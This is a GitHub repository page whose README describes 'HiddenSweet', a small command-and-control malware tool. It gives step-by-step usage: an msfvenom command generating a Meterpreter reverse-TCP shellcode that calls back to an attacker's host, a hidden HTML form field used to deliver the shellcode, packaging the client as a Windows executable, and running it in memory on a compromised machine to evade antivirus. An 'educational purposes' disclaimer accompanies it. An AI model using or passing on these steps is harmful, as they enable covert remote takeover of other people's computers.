Skip to content

depasonico/HiddenSweet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

HiddenSweet

[+] Simple Command and Control malware for PoC

This simple client connects to a HTML page with meterpreter reverse payload, and executes this on memory evading some antivirus intalled in the compromised PC. This tool is just for educational purposes.

[+] Contributions

If you want to contribute to this project please feel free to do so, you can fork this project and make copies of it just please refer this original site in all your work.

[+] Requirements

In order to use this tool you will need to have:

[*] python 3
[*] BeautifulSoup
[*] Pyinstaller

[+] Setup

[*] Install all dependencies
[*] git clone https://github.com/depasonico/HiddenSweet.git HiddenSweet
[*] cd HiddenSweet

[+] Usage

[*] Edit HiddenSweetCli.py in URL
[*] Generate your meterpreter shellcode, like: msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f python
[*] Create a HTML page with a hidden field like: <input type="hidden" name="fooId" value="SHELLCODE" />
[*] Create a EXE file using Pyinstaller http://www.pyinstaller.org/
[*] Execute the exe file in your compromised windows system

[+] BUGS ლ(ಠ益ಠლ)

[*] None

[+] Contact

[*] Drop me an e-mail to depasonico@gmail.com

About

Simple Command and Control malware for PoC

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages